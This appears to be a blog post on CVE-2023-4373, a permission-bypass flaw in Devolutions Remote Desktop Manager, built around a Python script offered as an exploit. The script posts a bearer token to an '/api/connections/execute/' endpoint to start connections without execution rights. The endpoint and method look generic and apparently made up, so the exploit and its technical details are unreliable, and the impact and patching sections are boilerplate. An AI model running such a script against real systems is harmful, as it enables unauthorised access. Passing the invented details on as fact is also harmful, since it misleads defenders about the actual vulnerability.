CVE-2023-4373 – Bypassing Validation of Permissions in Devolutions Remote Desktop Manager: Exploiting Remote Tools and Macros

Today, I will be discussing a recently identified vulnerability in Devolutions Remote Desktop Manager (RDM) versions 2023.2.19 and earlier. The vulnerability, identified as CVE-2023-4373, allows a user to bypass proper validation of permissions when using remote tools and macros, thereby enabling a user to initiate a connection without the required execution rights. In this post, I'll cover the technical details of the vulnerability, provide a code snippet demonstrating the exploit, and discuss the potential impacts of this security flaw. But first, let's understand what Devolutions RDM is and its role in managing remote connections.

Details of CVE-2023-4373

Devolutions RDM is a popular and efficient tool for managing remote connections and securely storing all your passwords, credentials, remote connections, and sensitive information in a centralized location. It boasts a wide range of features, including the ability to integrate with more than 60 third-party tools and services. However, it's this extensive feature list that introduces the CVE-2023-4373 vulnerability.

Inadequate permission validation in the remote tools feature leaves room for exploitation. A malicious user can exploit this vulnerability to initiate a remote connection without proper execution rights. This oversight exposes sensitive data and remote connections to unauthorized access.

Code Snippet

Below is a demonstration of how an attacker might exploit the CVE-2023-4373 vulnerability using a simple Python script:

import requests

# Replace with the address of your Devolutions RDM instance
url = "https://rdm.example.com";

# The user's authentication token goes here
auth_token = "your_token_here"

# Replace with the target remote connection ID
remote_conn_id = "target_connection_id"

# Request headers
headers = {
    "Authorization": "Bearer "+auth_token,
    "Content-Type": "application/json"
}

# Initiate the connection bypassing the proper permissions validation
response = requests.post(
    url + "/api/connections/execute/" + remote_conn_id,
    headers=headers
)

print(response.status_code)
if response.status_code == 200:
    print("Successfully initiated the remote connection")
else:
    print("Could not initiate the remote connection")

By using this Python script, an attacker can initiate a connection without the required execution rights in a vulnerable RDM installation.

For more information on the identified vulnerability, refer to the following sources

1. MITRE CVE Entry: CVE-2023-4373
2. NIST National Vulnerability Database: CVE-2023-4373

Potential Exploit Impacts

If exploited, the CVE-2023-4373 vulnerability exposes sensitive data and remote connections to unauthorized access, leading to security breaches and ultimately, devastating consequences for businesses relying on Devolutions RDM to secure their remote connections. This may include unauthorized access to company resources, data exfiltration, and potentially the further spread of malware within the connected network.

Conclusion

In conclusion, if you're a user of Devolutions RDM, it's crucial to ensure your software is up-to-date and patched against the CVE-2023-4373 vulnerability. As remote work continues to be a significant part of the modern workforce, implementing strong security measures and investing in IT solutions that prioritize data security is now more important than ever before. Stay informed and vigilant against potential threats to protect your organization's assets, data, and connections.

Timeline

Published on: 08/21/2023 19:15:00 UTC
Last modified on: 08/25/2023 17:57:00 UTC